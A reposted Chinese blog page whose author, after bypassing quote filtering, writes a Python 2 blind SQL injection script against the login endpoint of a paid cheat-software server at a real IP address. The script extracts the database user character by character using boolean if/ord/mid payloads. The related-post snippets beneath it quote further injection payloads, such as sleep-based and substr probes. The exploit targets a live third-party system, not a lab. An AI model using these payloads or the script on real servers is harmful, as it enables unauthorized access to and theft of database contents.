mysql 盲注 if_教科书般的mysql布尔型盲注(附验证脚本)

最新推荐文章于 2022-03-01 23:39:28 发布
最新推荐文章于 2022-03-01 23:39:28 发布
阅读量154 收藏
点赞数
文章标签: mysql 盲注 if
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_36390615/article/details/113142340
版权

返回这么一个字符串

经过测试过滤了单引号,奇葩的是SQL语句中的表名是通过$_GET获取的,这样就不需要单引号注入了

8f3ff2fbfdd7c7c8339951a6542705fa.gif

3.png (12.66 KB, 下载次数: 147)

2016-8-14 23:26 上传

8f3ff2fbfdd7c7c8339951a6542705fa.gif

4.png (38.09 KB, 下载次数: 170)

2016-8-14 23:26 上传

他妈的从select语句变成了update语句,当时有点懵,后来才想明白,这是因为登录不止执行了一条SQL语句,还会执行update语句更新收费会员的信息,这样万能密码就绕不过去了,还是得想办法跑数据啊。SQLMAP应该是不能识别这种注入点的。

写了个python脚本。

[Python] 纯文本查看 复制代码import urllib2

import re

opener = urllib2.build_opener()

opener.addheaders.append(('Cookie', 'ZDEDebuggerPresent=php,phtml,php3'))

payloads = 'abcdefghijklmnopqrstuvwxyz0123456789@_.'

user = ""

for i in range(1,31):

for p in payloads:

s1 = "%s" %(i)

s2 = "%s" %(ord(p))

s = "http://115.159.147.96/ap_Verify.php?a=nb_softuser`+where+1+=+1+and+if(ord(mid(user(),"+s1+",1))="+s2+",1,0)+--+&user=a&pass=a&key=a&ver=16&soft=VM"

try:

req = urllib2.Request(s)

req_data=opener.open(req,timeout=20)

#print req_data.read()

if re.findall('fa27f303f2dc7138a4a05578daf7e4ac',req_data.read()):

user+=p

print '\n user is:',user,

else:

print '.',

except urllib2.URLError,e:

break

8f3ff2fbfdd7c7c8339951a6542705fa.gif

5.png (29.51 KB, 下载次数: 154)

2016-8-14 23:27 上传

最后打个广告,mysql时间盲注教科书地址:http://www.f0rg3t.com/post/1de4895e_a4c9d97

脱渊
关注
教科书般的mysql布尔盲注(验证脚本)
qq_35855403的博客
08-16 1681
遇到一收费外挂,登录处抓包http://115.159.147.96/ap_Verify.php?a=nb&user=asdasdasdas&pass=A3DCB4D229DE6FDE0DB5686DEE47145D&key=8E7CACDD62339A1D7A100347055D9104&ver=163&soft=VM&num=EJGDCHHCDX...
MySQL教科书】轻松入门的MySQL知识清单(SQL命令大全)
奈何的人生
03-28 7165
文章目录一、引言1.1 现有的数据存储方式有哪些?1.2 以上存储方式存在哪些缺点?二、 数据库2.1 概念2.2 数据库的分类三、数据库管理系统3.1 概念3.2 常见的数据库管理系统四、MySQL4.1 简介4.2 访问与下载4.3 配置环境变量4.4 MySQL的目录结构4.5 MySQL配置文件五、 SQL5.1 概念5.2 MySQL应用5.3 基本命令六、客户端工具6.1 Navica...
sqli-labs盲注脚本
06-24
sqli-labs盲注脚本 sqli-labs盲注脚本 sqli-labs盲注脚本
MySQL布尔盲注
一个普普通通的博客
03-01 1574
Mysql注入—布尔盲注
SQL盲注脚本MySQL
卧龙居
11-13 1325
#coding:utf-8 import urllib.request import json """ SQL盲注脚本,适用于MYSQL数据库;CTF 0~1 SQL注入第二题 """ class SqlBlindInjection(object): def __init__(self): self.url = "http://eci-2zej1goyn9jgugq1cnzn.cloudeci1.ichunqiu.com/login.php" #条件为真的返回值.
【20】WEB安全学习----MySQL注入-5(布尔盲注)
尚未佩妥剑 转眼便江湖
09-20 481
布尔盲注例子演示: 本次代码不输出具体的查询记录结果,如果存在ID值则输出一个状态,不存在ID值则输出另一个状态,也不会输出SQL报错状态,为布尔盲注。 <?php header('content-type:text/html;charset=utf-8'); @$id=$_GET['id']; //传参 if(!isset($id)){ ...
Python速成课程实践:教科书实践的作业
02-20
"Python速成课程实践"的标题和描述暗示我们即将探讨的是一个针对初学者或希望快速掌握Python编程技能的人群的课程,其中包含了一系列基于教科书的实践作业。 在Python的学习过程中,实践是至关重要的。通过完成各种...
Evosuite用maven构建(内详细过程)
nicezheng_1995
10-11 4826
Evosuite用maven构建 【参考来源】http://www.evosuite.org/documentation/tutorial-part-2/ !如果在照着做出现找不到文件的情况,请翻到本文最后看最终的pom.xml配置以及文件结构 pom.xml <?xml version="1.0" encoding="UTF-8"?> <project xmlns="http:...
php教材
06-04
此外,PHP支持多种数据类,包括字符串、整、浮点布尔以及数组和对象。 函数是PHP中的重要组成部分,允许重复使用代码。内置函数如 `echo` 和 `print` 用于输出内容,`strlen()` 可计算字符串长度,`count...
albatar:Albatar是Python中SQLi开发框架
05-25
我写了Albatar来拥有一个整洁的工具来... 让我们使用Albatar在上利用基于联合的教科书SQLI。 克隆存储库,然后创建以下脚本: from albatar import * import re PROXIES = {} #'http': 'http://127.0.0.1:8080', 'htt
mysql数据库的布尔盲注_Mysql 高级盲注布尔盲注【sqli blind】
weixin_32308101的博客
02-18 160
什么是盲注 [sqli blind]?盲注通常都是专门为了对付目标页面错误处理的比较好的这种情况,也就是说,有时即使目标存在注入,因为在页面上没有任何回显,此时再想利用常规的union曝数据字段可能就不大现实了,于是后来就被人发现了盲注这种技巧,关于盲注的常用类,主要有三种,基于时间,布尔,错误[实际遇到的非常少]的盲注,不过我们今天暂时只针对布尔盲注做详细说明,关于其它的技巧,后续还会再单...
mysql注入入门_sql注入入门之mysql布尔盲注
weixin_31727797的博客
02-19 176
1,实例 mysql 盲注点,如下,虽然这并不是个标标准准的盲注点,但并不影响我们用盲注的方式来获取1、http://www.vuln.com/wexpage.php?id=212,一阵单引号过后,目标1、http://www.vuln.com/wexpage.php?id=21'3,尝试闭合,还是前面的问题,不要一眼看到数字就认定它是个数字注入,比如该实例就又是个字符注入,我们只需闭合前面的...
sql注入之布尔盲注-脚本
星空下de青铜
05-05 3005
sql注入之布尔盲注-脚本 先给大家普及一下 在MySQL中,把 information_schema 看作是一个数据库,确切说是信息数据库。其中保存着关于MySQL服务器所维护的所有其他数据库的信息。 information_schema数据库常用表说明: SCHEMATA表:提供了当前mysql实例中所有数据库的信息。如show databases就是在这查询的 TABLES表:提供了关于数据...
mysql 盲注二分法python脚本
weixin_30384217的博客
04-29 1362
import urllib import urllib2 def doinject(payload): url = 'xxxxxxxxxxxxxxxxxxxxx' values = {'injection':payload,'inject':'Inject'} data = urllib.urlencode(values) #print d...
mysql盲注代码
萧刚
10-09 768
盲注代码 ',(select/**/if((select/**/ord(substr(user(),1,1)))=114,sleep(3),0)),1)#
mysql盲注二分法脚本
zh_cn1的博客
08-12 453
PS 闲得蛋疼,写了个盲注脚本,最后发现还是sqlmap香 import requests #布尔盲注mysql脚本 #正常页面的大小 def resLen(url): res=requests.get(url) return len(res.text) #当前数据库长度 def currdb_len(url): payload="1' and length(database())=" for i in range(1,100): if resLen(url+payload+str(i
布尔盲注脚本-sqlilabs-less6
wuerror的博客
02-01 407
写这个起因是用sqlmap跑完,从日志里看它payload想自己复现一下。 不过sqlmap好像并没有识别数据库名的长度,而是直接从第一位开始判断。也可能它payload混在了前面识别类的里面我没注意。判断库名的部分payload如下 ID:1" AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),1,1))>64# ID:1" ...
mysql基于bool盲注,基于布尔盲注脚本编写实例
weixin_39864261的博客
03-18 163
一个基于布尔盲注脚本编写实例前置知识判断user长度-1 OR if((length(user())=14),1,0)查user()-1 OR if(ascii(substr(user(),1,1))=114,1,0)查database()-1 OR if(ascii(substr(database(),1,1))=114,1,0)查version()-1 OR if(ascii(substr(...
SQL-LABS GET布尔盲注脚本(node)
AaronLuo
09-03 369
原理 基于SQL-LABS LESS-5,LESS-8 GET布尔注入,(布尔盲注详解),,基于MSQL 布尔盲注,主要是判断ascii码值是否与猜测的值相同,通过判断页面变化,确定ascii值 由于0-z的ascii值是48-122,256 = 2 ^ 0 + 2 ^ 1 + 2 ^ 2 + 2 ^ 3 + 2 ^ 4 +2 ^ 5 + 2 ^ 6 + 2^ 7 ,通过按位与运算8次,结果相加...
MySQL布尔高级盲注实战与技巧解析
总结来说,MySQL布尔盲注是一种技术性较强的注入攻击手段,它利用服务器对布尔表达式结果的响应来推测SQL语句的执行情况,攻击者需要灵活运用条件构造和工具辅助,以确保信息的获取和攻击的有效性。在安全防御中,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值